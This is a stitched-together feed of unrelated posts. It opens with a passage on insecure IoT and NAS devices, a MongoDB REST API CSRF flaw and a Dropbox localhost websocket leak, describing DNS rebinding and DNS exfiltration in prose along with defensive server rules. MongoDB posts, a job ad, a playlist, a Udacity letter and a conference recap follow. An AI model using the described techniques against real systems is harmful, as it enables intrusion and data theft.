          IOT Devices - Many of Which, Are Insecure

          IOT Devices - Many of Which, Are Insecure

          MIRAI did not only target home routers. Other victims included IP cameras and digital video recorders. More often than not security does not play an important role in the design of Internet Of Things (IOT) devices. And we install such insecure products on our home and corporate networks.

          And to make things worse, many people who do not have IT security experience, tend to disable all firewalls and other security services on them to make the IOT devices, such as an IP camera, available over the internet. These types of setups can have unpredictable outcomes for the security of the devices connected to our networks, and can be an open door invitation to attackers and allow them to target other parts of the systems.

          Vulnerability NAS Servers

          NAS servers have become very common nowadays. They are used to manage and share files across all the devices on a network. Almost like any other device, NAS servers can be configured via a web interface, from which users for example, are allowed to download files.

          NAS servers are also an additional attack surface. Similar to what we explained above, the attacker can use CSRF or DNS rebinding attack to interact with the web interface. Since these web interfaces typically have root access to allow the user to change ports etc, once an attacker gains access he can easily fully compromise the server.

          Vulnerable Services Typically Used By Developers

          Misconfigured MongoDB Services

          Logo for MongoDB Services

          On the rare occasion or a properly set up MongoDB instances to bind on localhost instead of 0.0.0.0, they can still be vulnerable to attacks through their REST API. The REST API is typically enabled because it is a useful feature for frontend developers. It allows them to have their own test datasets without having to rely on a finished backend. The data is returned in JSON format and can therefore be used with native JavaScript functions.

          However this web interface has some serious flaws like CSRF vulnerabilities, that can lead to data theft as described in this proof of concept of a CSRF attack in the MongoDB REST API. In short, we used an OOB (Out of band) technique to exfiltrate the data over DNS queries. The API is marked as deprecated, however it was still present in the latest version we tested at the time we wrote the article.

          DropBox information Disclosure

          Logo for DropBox

          Another rather interesting vulnerability is the one we found in the dropbox client for Windows. In order to communicate with the client, the website dropbox.com was sending commands to a websocket server listening on localhost.

          However, by default websockets allow anyone to send and receive data, even when the request originates from another website. Therefore to verify the origin, the Dropbox client uses a handshake that needs to be correct in order to verify the sender's origin.

          It consisted of a check of a nonce, a string of characters only known to dropbox and the client. It was directly queried from the Dropbox server and there was probably a check for the origin header. This means that a connection can take place, but no data could be sent from localhost if the origin was not correct.

          However, when any random website connects to the websocket server on localhost, the Dropbox client would prematurely send a handshake request. The handshake request included information such as the id of that particular request, which OS was in using, and the exact version of the dropbox application. Such information should not be leaked through such channel, especially since it could be read by any third party website just by starting a connection request to the server on localhost.

          Note: The issue was responsibly reported to Dropbox via Hackerone. It was immediately triaged and awarded with an initial bounty as well as a bonus since the report helped them find another issue.

          How Can You Prevent These Type of Attacks?

          Simply put, to prevent DNS rebinding attacks at server level just block access and requests when the host header in the HTTP request does not match a white list. Below is an explanation of how you can do this on Apache and IIS web server.

          Blocking DNS Rebinding Attacks on Apache Server

          On apache you can block access if the host header does not match 127.0.0.1 with mod_authz_host, by adding these lines to your configuration:

          <If "%{HTTP_HOST} != '127.0.0.1'">

          Require all denied

          </If>

          Therefore, if someone tries to launch a DNS rebinding attack, the requests will be blocked and the server will return a HTTP 403 message.

          Blocking DNS Rebinding Attacks on Windows IIS

          It is very easy to block DNS rebinding attacks on the Microsoft IIS web server. All you need to do is add a rule of type “Request blocking” in the URL rewrite menu with the following options:

          • The “Block access based on” field has to be set to “Host header”
          • The “Block request that” field has to be set to “Does Not Match the Pattern”. As pattern one or more host headers can be used. (source).

          Other Measures to Block Such Type of Attacks

          Another good countermeasure is to block third party cookies in the browser, and to use the same-site attribute in cookies on the web application that is being developed.

          Other than that, apply the same security measures on internal websites as if they are publicly available. The web application should not be vulnerable to CSRF, cross-site scripting, SQL injection and other types of web vulnerabilities to guarantee a safe testing environment.

          As an additional security measure run the web application on a virtual machine. Even though this is often not necessary, and complicates matters, it can lessen the impact of a compromise. This setup is mostly recommended for security researchers that want to run vulnerable web applications on their machine.

          Live Demo of Firewall Bypass

          Sven Morgenroth, the researcher who wrote this article was featured during Paul's Security Weekly. During the show, Sven demoed how a hacker can actually exploit the above documented vulnerabilities to bypass firewalls.


                    A replacement for sessions        

          I'm tired of sessions. They lock for too long, reducing concurrency, and in my current case, don't fail gracefully when a request takes longer than the session timeout.

          Problem: Session locks

          Session implementations typically lock very near the beginning of a request, and unlock near the end of a request. They tend to do this even if the current request handler does no writing to the session. Why so aggressive? Because the typical test case trotted out for sessions is that of a page hit counter: session.counter += 1. What if the user opens two tabs pointing at the same page at once? The count might be off by one!

          But if you don't do any counting, what's the benefit of such aggressive, synchronous locking? What we could really use is a system that used atomic commits instead of large, pessimistic locks.

          Problem: Session timeouts

          Sessions are often used for sites with thousands, even millions, of users. When any one of those users walks away from their computer, the servers usually try to free up resources by expiring any such inactive sessions. But lots of my admin-y sites have a few dozen users, not thousands. I'm just not that concerned with expiration of session state. I'm a little bit concerned, still, with cookies, so I still want to expire auth tokens. But there's no need to aggressively expire user data. But I find my current apps are so aggressive at expiring data that we frequently get errors in production where request A locked the session, and while it was processing a large job, request B locked the session because A was taking too long. B finishes normally, but then A chokes because it had the session lock forcibly taken away from it. Not fun.

          What we could really use is a system that allows tokens to expire, or be reused concurrently, without forcing user data to expire or other, concurrent processes to choke.

          Problem: Session conflation

          Sessions are used for more than one kind of data. In my current apps, it's used to store:

          1. Cookie tokens. In fact, the session id is the cookie name.
          2. Common user information, like user id, name, and permissions, and
          3. Workflow state, such as when a user builds up an action over multiple pages using multiple forms.

          The problem is that each of these three kinds of data has a different lifecycle. The session id tends to get recreated often as sessions and cookies time out (taking all of the rest of the data with it). The user info tends to change very rarely, being nearly read-only, but is often read on every page request (for example, to display the user's name in a corner, or to apply the user's timezone to time output). Workflow data, in contrast, persists for a few seconds or minutes as the user completes a particular task, and is then discardable at the end of the process; it never needs concurrency isolation, because the user is working synchronously through a single task.

          Sessions traditionally lump all of these together into a single bag of attributes, and place the entire bag under a single large lock. What we could really use is a solution that had finer-grained control over locking for each kind of data, even for each kind of info or workflow!

          Solution: Slates

          We can achieve all of the above by abandoning sessions. Let's face it: sessions were cool when they were invented but they're showing their age. And rather than try to patch them up and keep calling them "sessions", I'm inventing something new: "slates".

          I'm implementing slates in MongoDB, but you don't have to in order to get the benefits of slates. All you need is some sort of storage that uses atomic commits, and that allows you to partition such that you have a moderate number of "collections" (one for each user, plus a special "_auth" collection), and a moderate number of "documents" (one for each use case) in each collection. Let's look at an example:

          
          $ mongo
          MongoDB shell version: 1.6.2
          connecting to: 127.0.0.1/test
          > use slates
          switched to db slates
          > show collections
          _auth
          admin
          > db.admin.find()
          { "_id" : "user", "userid" : 999, "readonly" : false,
            "timezone" : null, "panels" : [
              [1, "pollingpoint"],
              [2, "unsampled"],
              [4, "test_redirect"],
              [6, "test_redirect_manual"]
          ], "staff" : true }
          { "_id" : "new_id_set", "name" : "My set",
            "ids" : [ 84095, 3943, 39845, 112, 9458, ... ] }
          

          As you can see, there is a collection for the username "admin". It contains 2 documents.

          User info

          The first returned document is what I called "user info" above: things most pages want to know about the logged-in user. They're read for almost every request but changed hardly ever, and when they're read, it's very near the beginning of the request. Here's the Python code I use to grab the whole document:

          request.user = Slate(username).user

          ...which is API sugar for:

          request.user = pool.slates[username].find_one('user') or {}

          Most pages perform this quick read and never write it back.

          Workflow data

          The second document returned above is workflow data for a domain-specific process I called 'new_id_set': the user uploads a large number of id's in a CSV file and gives them a name. But if there are problems with a few of the id's, we want to ask the user whether to discard the conflicts or continue anyway. But we don't want to go making records in our Postgres database tables until the numbers are confirmed, and it's prohibitive to have the client upload the same file again after confirmation. So we need a temporary place to stick this data while the user is in the middle of the activity.

          Slates to the rescue! Unlike sessions, which tend to dump all their data into a single big bag, when we use slates we store our data in multiple 'bags'. That means that our user can upload their ids, be prompted for confirmation, go elsewhere to investigate the conflicts further, and come back and confirm the ids. The time they spend investigating incurs no performance penalty, because those pages don't load and re-save the 'new_id_set' slate--only the pages directly concerned with that particular slate do. Once the user has confirmed the upload, the slate is deleted.

          Auth tokens

          Most of the use cases for slates fit nicely into "user slates"; that is, a collection that is identified by the user's username. But when you receive an auth token in a cookie, how do you match it to a username so you can look up the slate?

          The answer is to create a special, global slate which I named "_auth" in my implementation. You can name it whatever you like. This collection contains a map from tokens to usernames:

          
          > db._auth.find()
          { "_id" : "abcdef09345", "token" : "94ee8f572",
            "username" : "admin",
            "expires" : "Wed Sep 22 2010 13:39:51 GMT-0700 (PDT)"}
          

          When a user visits a page, their token is searched for in the "_auth" collection, the username is retrieved, and that value is stored for the request. Typically, their "user info" slate is then retrieved. Finally, if they are visiting a page that participates in a slate-based workflow, that slate is retrieved (and saved if any changes are made).

          Conclusion

          Slates provide finer-grained locking than sessions in order to meet the varying needs of auth tokens, user info, and workflow data. They lock for much shorter durations, over smaller scopes, and take advantage of the native atomicity of the storage layer (MongoDB, in my case) allowing much more parallelism between requests.


                    Work at World Singles? CFML / Clojure Developer wanted!        

          We're expanding our Clojure / CFML development team and looking for our next "Senior Web Applications Developer". You'll get to work from home full-time, with myself, Charlie Griefer and the rest of our small (but growing) development team spread out across the USA. You'll work on our Internet dating platform in both CFML and Clojure. We're all-Mac for development and all-Linux for deployment so you'll need to have some *nix chops and we'd prefer folks with MySQL and MongoDB experience. Yes, I know that's a pretty specific set of skills but we can be flexible if you're the right person for the team.

          I've been with World Singles full-time for two years now (and about a year of consulting before that) and I think they're a great bunch of people, solving an interesting set of problems, with millions of customers all around the world - so you get real world feedback about what you produce! I love working here and I'm looking forward to growing our team.

          You can read the official job listing on Craigslist (and that's how you apply - send your resume and cover letter to the address listed there). Feel free to ask me questions about the role, either in comments here or directly via the contact me page.


                    JOINING COLLECTIONS IN MONGODB USING THE C# DRIVER AND LINQ        
          A flexible IoT platforms needs a flexible database that can handle dynamic data, and can scale well. MongoDB is probably the most popular NoSql Database out there and it’s relatively easy to use in conjunction with .Net with the official driver. It is a document DB which has many advantages in terms of schema-less/dynamic properties. […]
                    How do I insert a document into MongoDB collection?        
          In the last MongoDB example, How documents are represented in MongoDB Java Driver?, we’ve seen how MongoDB JSON documents are represented in MongoDB Java driver. Using this knowledge it is time for us to learn how to insert documents into MongoDB collections. We will create a code snippet that will insert documents into the teachers […]
                    How do I connect to a MongoDB Database?        
          In the previous post you have seen how we installed the MongoDB database server and try to use the MongoDB shell to manipulate collections in the database. You also have been introduced how to obtain and setup the MongoDB Java Driver that we can use to manipulate the MongoDB database from a Java program. Starting […]
                    The Heavy Set 07-25-2017 with Ray Wentz        
          Playlist:

          Philip Cohran And The Artistic Heritage Ensemble- The Minstrel - Philip Cohran And The Artistic Heritage Ensemble
          Geri Allen- And They Partied - Maroons
          Riverside- Enormous Tots feat Dave Douglas Chet Doxas Steve Swallow Jim Doxas - The New National Anthem feat Dave Douglas Chet Doxas Steve Swallow Jim Doxas
          Ambrose Akinmusire- Brooklyn ODB - A Rift In Decorum Live At The Village Vanguard
          The Bern Nix Trio- Ballad For L - The Bern Nix Trio Alarms And Excursions
          Ronald Shannon Jackson The Decoding Society- Nightwhistlers - Eye On You
          Wadada Leo Smith- SequoiaKings Canyon National Parks The Giant Forest Great Canyon Cliffs Peaks Waterfalls And Cave Systems 1890 - Americas National Parks
          Sun Ra His Myth Science Arkestra- Rocket Number Nine Take Off For The Planet Venus - Interstellar Low Ways Remastered 2014 feat John Gilmore Pat Patrick Marshall Allen James Spaulding
          Geri Allen- Windows To The Soul - EyesIn The Back Of Your Head
          Kelan Philip Cohran Hypnotic Brass Ensemble- Spin - Kelan Philip Cohran And The Hypnotic Brass Ensemble
          Gerry Gibbs Thrasher People- Punk Jazz - Weather Or Not
          Sun Ra And His Arkestra- Big City Blues - Singles The Definitive 45s Collection Vol 1 19521961
          Sun Ra His Myth Science Arkestra- Music From The World Tomorrow - Angels And Demons At Play Remastered 2014 feat John Gilmore Pat Patrick Art Hoyle
          FujiwaraGoldbergHalvorsen- TroutLily - The Out Louds
          Geri Allen- Dancing Mystic Poets At Twilight - Flying Toward The Sound A Solo Piano Excursion Inspired By Cecil Taylor McCoy Tyner And Herbie Hancock
          Bern Nix- Low Barometer - Low Barometer
          Ornette Coleman- What Reason - Three Women Sound Museum
          Ornette Coleman- Latin Genetics - In All Languages
          Hypnotic Brass Ensemble- Malcuth Interlude feat Phil Kelan Cohran - Sound Rhythm Form


          playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/25/playlistDate/2017-07-25
                    5 años de inteligencia artificial :)        
          Dear Gorka,
          I can't believe it. It's been an exhilarating five years. Today, Udacity turns five!
          Udacity started with a phone call to Peter Norvig. I wondered if it made sense to take our Stanford class CS223 “Introduction to Artificial Intelligence” online, and make it available to all people in this world. Peter was enthusiastic, and along with my co-founders David Stavens and Mike Sokolsky, we made it happen. This wasn't the first MOOC, but it was the one that put Massive Open Online Courses on the map. In a few weeks, we gathered 160,000 students. Our course taught Artificial Intelligence to more people than all other AI professors combined at the time.
          Fast forward to today. Udacity is now rapidly becoming the place to go for lifelong learning where millions are learning the latest skills that Silicon Valley has to offer. Tech giants like AT&T, Google, Facebook, Amazon, GitHub and MongoDB are using us to reach any willing learner in the world. And companies are eagerly hiring our graduates. We have educated more students that many four-year colleges. And recently, we started placing our graduates in jobs in the tech industry and beyond, based on their Nanodegree program credentials.
          Our fifth anniversary is a great moment of reflection. To many, education is a numbers game. It's about tuition, graduation rates, enrollment. To me, education is all about people. Every time I receive a thank-you note from a student, a letter on how we changed a person's career, I am in tears. I have this very deep belief that if we open up high-quality education, if we truly democratize it, if we give every human being on this planet a fair chance, we will make a huge difference. Today, high-quality education is a privilege of the few. Our vision at Udacity is to make high-quality education a basic human right. If we do this, I truly believe we can double the world's GDP.
          I look back at the past five years and feel we did the impossible. We created a company that allows eager learners of all geographies and all ages to engage in meaningful education, and to live their lives' dreams. To encourage even more of you to find your dream careers through Udacity, I have something special to share. In celebration of our 5-year anniversary, we will give any student who enrolls 55% off your first month!
          Udacity is a story of amazing students, people just like you. Many have stayed with us through the years, assisted us in improving our offerings, and helped us spread the word. I really want to thank every single student who has been willing to trust us as a source of learning. Udacity would not exist without you, and you are the focus of our work.
          Every single student who discovers their dream career through Udacity makes me believe life is worth living. Thank you for being a part of the Udacity community!
          Excitedly,
          Sebastian Thrun
          Co-Founder & CEO of Udacity
          P.S. Enroll before 7/10/16 using the link above, and the 55% discount will be applied automatically.

                    94 Suburban ODB Code 22         
          This code is: Throttle position (TP) sensor -voltage low Wiring open circuit/short circuit to ground, TP sensor, ECM This only happens after the engine comes to full operating temperature, then th...... The post has 1 replies so far. Read more and discuss here
                    cf.Objective() 2013 - What I Learned        

          It's Sunday afternoon after the best cf.Objective() ever and I'm looking over my notes to offer some thoughts on the last three days.

          Before I get to the content, I first want to call out the location as being awesome! The brand new Radisson Blu had some of the friendliest and more helpful staff I've encountered at a hotel. The food for the conference was amazing: terrific hot breakfast every morning and a delicious lunch buffet too. Possibly the best conference food I've ever had. In the evenings, my wife and I dined in the Fire Lake restaurant at the hotel - the food was so good, we didn't want to go anywhere else! Great selection of local beer on tap too. The hotel itself has a very nice modern feel to it, with excellent facilities and big, well-equipped room. I hope everything works out behind the scenes so that this is a candidate location for next year.

          A few weeks back, I blogged about the sessions I expected to attend and noted it was mostly going to be about JavaScript. In the end, I made a couple of changes to my planned schedule but still ended up going to a session in almost every single slot. This is rather unusual for me: at past CFML events I've often skipped a lot of sessions and just hung out chatting in the hallways. Last year, I manned the Railo booth and did not attend a single session (which was a little extreme) but normally I only attend one or two sessions a day. Here's out it played out this year...

          Thursday

          Despite my enthusiasm about the keynote, I got caught up in a post-breakfast conversation and by the time I got to the ballroom, the keynote was nearly over. Everyone I spoke to raved about how great it was and the TL;DR takeaway was: JavaScript is ubiquitous and you need to know it to build today's web apps.

          Next up was my polyglot session where I showed prototype objects, callbacks and closures from JavaScript - and how to do that in CFML - then a little Groovy with code blocks - and how to do that in CFML - then a little Clojure with (infinite) lazy sequences and map, filter, reduce - and how to do that in CFML! My point was that now we have closures in ColdFusion 10 and Railo 4, we have access to these very powerful and expressive techniques we see in other languages, and we should leverage those concepts in CFML to create simpler, more maintainable - and more powerful - software.

          Next was Ryan Anklam's "The Art Of JavaScript" presentation. He started out fairly gently showing some basic recommendations for safer code and then moved into some of the more subtle gotchas and traps for those of us new to JavaScript. I'd seen most of the points at some point in the past, spread across various blog posts and presentations I'd found online, but it all sunk in a little more this time and Ryan's presentation is an excellent collection of best practice "pro tips" that I'll bookmark and refer to often as I start to do more JavaScript.

          After lunch, I skipped Adobe's general session and just hung out chatting with folks in the sponsor / vendor area. There seemed to be a steady stream of people leaving the general session and joining the throng in the hallway which didn't really bode well. Pretty much everyone I spoke to said that Adobe's presentation was aimed at IT managers, not developers, and there was a general sense of disappointment with the content. So, as expected, it was a marketing spiel and not a very exciting one at that, it seems.

          Then I decided to go to Mark's "Top 10 Developer Features" in Railo. We're still on 3.3 at World Singles and this talk just made me more excited about upgrading to 4.1! Railo really are working hard to improve the language and make developers more productive.

          My second session was well-attended, covering how Object-Relational Mapping breaks down because of a fundamental impedance mismatch between the object model and the relational model. I offerred that a document-based store, such as MongoDB, alleviates the mapping problems (and of course introduces other tradeoffs). I had a minor demo fail (and jokingly blamed it on Windows... when I later rebooted, the demo worked just fine without any other changes... no comment!). I was pleased to get so many questions from the audience and continued Q&A in the hallway after the talk for almost an hour and a half, missing the next session!

          Friday

          Kurt Wiersma's two hour deep dive into AngularJS and Bootstrap was excellent! The high point of the conference for me. Kurt maintained a great pace and flow through the material and AngularJS itself is very slick. If you missed his talk, make sure you track down his slide deck after the conference! Highlights for me included dependency injection, two-way data binding, built-in support for testing / testability, and directives (UI components that are invoked like custom tags).

          Scott Stroz entertained us immensely with a look at Groovy and Grails and what he likes about it, as well as how it's made him a better CFML developer (because now he has been exposed to more advanced techniques from another language). Rakshith from Adobe was in the front row and Scott ragged on him quite a bit when he was comparing feature after feature to ColdFusion and showing where Groovy was better. It wasn't helped by some people in the audience (yes, including me) pointing out that Railo already has some of these features from Groovy, that ColdFusion is missing!

          After lunch, I attended Railo's general session and ended sat between Rakshith and a very sickly-sounding Dave Ferguson (there seemed to be a lot of illness in the attendees this year - including Elliott Sprehn losing his voice so badly he had to cancel his talk). Again, a barrage of great CFML language features (making me even more determined to upgrade!), as well as a sneak peek at a new monitoring tool (from one of Railo's investors) that will show cflock times / failures, mails sent, query information etc all down to the page template, tag, line number. There will be both a free version and a commercial version. Sean Shroeder from Blue River / Mura CMS took the stage to talk about the Open CFML Foundation which is working to spread the word about CFML and some of its open source projects outside the CFML community, as well as working on an "academy" for teaching new developers about CFML. It all looked very exciting and I think a lot of attendees will be taking a serious look at Railo after this.

          I decided to attend Dave Ferguson's SQL skills / performance talk which covered some ground I already knew and a lot of ground that I wasn't aware of, including a lot of the internal machinery around query plans and how they are cached and reused. Great material!

          Finally it was my Humongous MongoDB session where I showed how to set up a replica set live and how to create a sharded cluster live. I also covered the concepts of write concern and read preference, and touched on both map/reduce and the built-in aggregation framework as examples of dealing with complex queries on very large data sets. The talk ran long but almost everyone stayed to the end, with plenty of questions about MongoDB at scale in production.

          Due to the fabulous food at the Fire Lake restaurant, I lost track of time and was late to the BOF I was supposed to be hosting. Luckily Kris Korsmo had stepped up a while back to co-host and was holding down the fort until I arrived. Great discussions about test-driven development, continuous integration, Git workflows, deployment strategies, automation, bug tracking and so on. I got the impression that the biggest obstacle for most CFML developers is some mentoring on how to get started down this path. One problem is that a lot of this material is extremely well-documented but CFML developers often don't seem comfortable reading outside their community and want a CF-specific version created (which I find very frustrating - stop being afraid of looking at other language websites!)

          Saturday

          Brad Wood kicked off the day with a talk about Backbone.js and Underscore for templating. After Kurt's AngularJS talk, I found this a bit scrappy and the code examples looked rather disorganized and hackish - but it was pointed out to me by several people that Backbone is "just" a library and doesn't set up a framework of best practices in the way that AngularJS does.

          I took a break from sessions to meet with a couple of attendees to talk in more depth about MongoDB and I rejoined the sessions shortly into Tony Garcia's coverage of the D3 visualization library for JavaScript. It's a very impressive piece of technology and some of the examples really wowed the audience. It's always educational to see just what can be accomplished in the browser with JavaScript!

          Brad Wood's second talk of the day with about the benefits of Agile software lifecycles. I think he did an excellent job contrasting traditional software development with Scrum and Kanban and explaining the principles behind high-quality, iterative software delivery. One of the best talks of the conference!

          Closing out the conference was Ryan Anklam, covering AMD and RequireJS which was something I'd never heard of before but turned out to be a very interesting way to tackle large project development in JavaScript and how to manage reusability and dependency management. He also showed us a little of what's coming in this area in the next version of JavaScript (Harmony).

          And then Jared was thanking everyone for attending, speaking, sponsoring and organizing, and it was all over until 2014!

          If you were there and we got to hang out, it was great to see you! If you were there and we didn't get to hang out, sorry, it's always difficult to make contact with everyone. If you weren't there, well you missed out on a great conference and a lot of terrific content...